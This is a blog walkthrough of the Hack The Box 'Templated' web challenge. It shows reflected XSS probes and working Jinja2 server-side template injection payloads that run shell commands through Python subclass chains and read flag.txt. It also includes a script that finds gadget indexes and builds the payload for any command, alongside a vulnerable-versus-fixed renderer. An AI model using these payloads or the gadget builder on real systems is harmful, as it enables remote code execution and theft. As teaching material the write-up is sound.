
Souvik Kar Mahapatra

Posted on • Updated on • Originally published at souvikinator.netlify.app

Hack The Box: Templated

templated

This is the second challenge in the web category, and most of the difficulty votes are for Easy. Let's try it out.

CHALLENGE TITLE: Templated

CHALLENGE DESCRIPTION: Can you exploit this simple mistake?

I don't know what the mistake is, so let's find out. You'll notice "Proudly powered by Flask/Jinja2" on the page, implying it's built with Flask/Jinja2; not sure yet whether that's useful.

If you inspect the elements or use the network tab in the dev tools, you won't find anything. However, we do have a URL, so we can try different URL paths and see how the server responds.

I'll go for http://134.209.16.184:32694/xyz and we get a 404 error, but notice that whatever we enter as the path in the URL is rendered back into the page. Let's try a few payloads for XSS.

If you try <h1>hello</h1> you'll be redirected to a Not Found page different from the previous 404 page. Weird! As soon as we pass HTML we get redirected to the Not Found page; there must be some sort of sanitization going on. Time to figure out how this sanitizer works!

figure out

Payload 1: <h1></h1>
Result: redirects to Not Found Page

Payload 2: </h1>
Result: redirects to Not Found Page

Payload 3: <h1>
Result: works!! Renders.

Looks like the sanitizer only looks for a closing HTML tag or, to be more specific, for </. (Keep in mind that </ also contains a /, the URL path separator, so the server may simply be routing /h1> as a second path segment and hitting a different 404 handler, rather than filtering the payload at all.)
Why does Payload 3 work? Because <h1> does not contain </, and HTML5 parsing is lenient: if an element is missing its closing tag, the browser closes it implicitly while building the DOM.

Thanks Browser!!

I guess we have to pop an alert to get the flag.

Payload: <img src=x onerror="alert('xss')">

and it works again, but still there is no trace of a flag. Let's inspect the element to see in what form our payload ends up in the DOM.

[Image: htb-web-chal-2-inspect.png]

Ever heard of <str>? I never have.

google time

Oops! Can't find anything useful. Maybe it is related to Flask/Jinja2. By the way, Jinja2 is a web template engine for Python, and the challenge title is also "Templated"! Maybe it is related to SSTI (Server Side Template Injection).

Payload 1: http://134.209.16.184:32694/{{100+100}}

Result: the page renders 200 where our input should appear, so the path is being evaluated as a Jinja2 template expression rather than treated as plain text.

So we have two findings: the path is reflected unescaped into the page, and it is evaluated as a template. What else can be done with SSTI apart from adding numbers? Here is a good article on SSTI with Jinja2 you can refer to.
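To make the root cause concrete, here is an added example (not the challenge's source code, which the writeup never shows) that reproduces the bug in a minimal Jinja2 404 renderer and puts the fixed version next to it. It uses Jinja2's Environment directly so it runs without Flask, and it assumes the jinja2 package is installed; the 404 page markup is a constructed stand-in.

```python
from jinja2 import Environment

# Constructed stand-in for the challenge's 404 page; the real template
# source is not shown in the writeup.
NOT_FOUND_SOURCE = "<h1>Error 404</h1><p>The page '{path}' could not be found</p>"


def render_404_vulnerable(path: str) -> str:
    """Vulnerable: the client-controlled path is pasted into the template
    SOURCE before Jinja2 parses it, so any {{ ... }} the client sends is
    evaluated server-side. This is the bug class the writeup exploits."""
    source = NOT_FOUND_SOURCE.format(path=path)
    return Environment().from_string(source).render()


def render_404_fixed(path: str) -> str:
    """Fixed: the template source is a constant and the path is handed to
    render() as a variable, so Jinja2 treats it as data, never as code.
    autoescape=True additionally HTML-escapes it, which also closes the
    reflected-HTML hole the writeup found first."""
    env = Environment(autoescape=True)
    template = env.from_string(
        "<h1>Error 404</h1><p>The page '{{ path }}' could not be found</p>"
    )
    return template.render(path=path)


if __name__ == "__main__":
    probes = (
        "/{{ 100 + 100 }}",                    # the writeup's arithmetic probe
        '/{{ "".__class__.__mro__[1] }}',      # first hop of the RCE chain
        "/<img src=x onerror=alert(1)>",       # the reflected-HTML probe
    )
    for probe in probes:
        print("vulnerable:", render_404_vulnerable(probe))
        print("fixed:     ", render_404_fixed(probe))
```

The vulnerable function evaluates the arithmetic probe to 200 and the second probe to <class 'object'>, exactly what the writeup observes; the fixed one returns the braces untouched and escapes the img tag. The fix is not a blacklist of {{ or </: it is never letting user input reach the template source at all.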

Strictly speaking __mro__ is not a function but a tuple, and it is the starting point for walking the Python object model: "".__class__ is str, "".__class__.__mro__[1] is object, and object.__subclasses__() lists every class currently loaded in the interpreter. Any of those classes whose __init__ is a plain Python function carries __init__.__globals__, the namespace of the module it was defined in, and that namespace holds __builtins__, which gives us __import__ and therefore os. That is the whole chain of the payload below. One caveat: the index 186 is specific to the challenge's Python version and the modules it has imported; on a different interpreter, or once a different set of modules is loaded, the same class sits at a different offset, so if the payload errors out, dump __subclasses__() first and locate a suitable class yourself.

Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

so the URL will look something like this:

http://64.227.43.192:32601/{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

[Image: templated-flag.png]

This lists the files in the application's working directory and, guess what, flag.txt is one of them. All we need to do now is replace ls * with cat flag.txt.

Final Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}

and boom! you have the flag.

I would recommend running each component of the payload as an individual payload, just to understand what each component outputs.
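Taking that advice one step further, here is an added example (my own code, not part of the writeup) that walks the payload's chain hop by hop in plain Python and, instead of trusting a hard-coded [186], discovers which indexes of __subclasses__() actually lead to __import__. It generalises the page's single payload: the search loop is the same thing you would run through the template against a remote target by dumping __subclasses__() once. The function names are mine; nothing here is Jinja2 API.

```python
def loaded_classes():
    """First hop of the writeup's payload: "" -> str -> object -> every class
    currently loaded in the interpreter (object.__subclasses__())."""
    return "".__class__.__mro__[1].__subclasses__()


def usable_gadget_indexes():
    """Indexes i for which the writeup's chain
        __subclasses__()[i].__init__.__globals__["__builtins__"]["__import__"]
    actually resolves. Two things break it on other classes: __init__ may be
    a C slot wrapper (it has no __globals__ at all), and a module's
    __builtins__ entry may be the builtins module instead of its dict
    (true for __main__), which cannot be subscripted with ["__import__"]."""
    indexes = []
    for i, cls in enumerate(loaded_classes()):
        init = getattr(cls, "__init__", None)
        module_globals = getattr(init, "__globals__", None)
        if not isinstance(module_globals, dict):
            continue
        builtins_entry = module_globals.get("__builtins__")
        if isinstance(builtins_entry, dict) and "__import__" in builtins_entry:
            indexes.append(i)
    return indexes


def import_via_gadget(index, module_name):
    """Walk exactly the chain the payload walks (minus Jinja2) from one index."""
    cls = loaded_classes()[index]
    return cls.__init__.__globals__["__builtins__"]["__import__"](module_name)


def build_payload(cmd):
    """The writeup's payload with a discovered index in place of the hard-coded 186.
    The index is only valid for the interpreter that computed it, which is
    precisely why a copied payload fails on a target with a different
    Python version or a different set of imported modules."""
    index = usable_gadget_indexes()[0]
    return (
        '{{"".__class__.__mro__[1].__subclasses__()[%d].__init__.__globals__'
        '["__builtins__"]["__import__"]("os").popen("%s").read()}}' % (index, cmd)
    )


if __name__ == "__main__":
    hits = usable_gadget_indexes()
    print("classes loaded:", len(loaded_classes()), "usable gadgets:", len(hits))
    print("index 186 would work in this interpreter:", 186 in hits)
    print(build_payload("cat flag.txt"))
    # Run a harmless command through the discovered gadget, as the final payload does.
    print(import_via_gadget(hits[0], "os").popen("echo gadget ok").read().strip())
```

Running it on two different Python installs usually prints different gadget counts and a different first index, which is the practical lesson behind the caveat above: enumerate on the target, never copy the number.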

See you on the next challenge.

"Set your goals high and don’t stop until you get there" -Bo Jackson
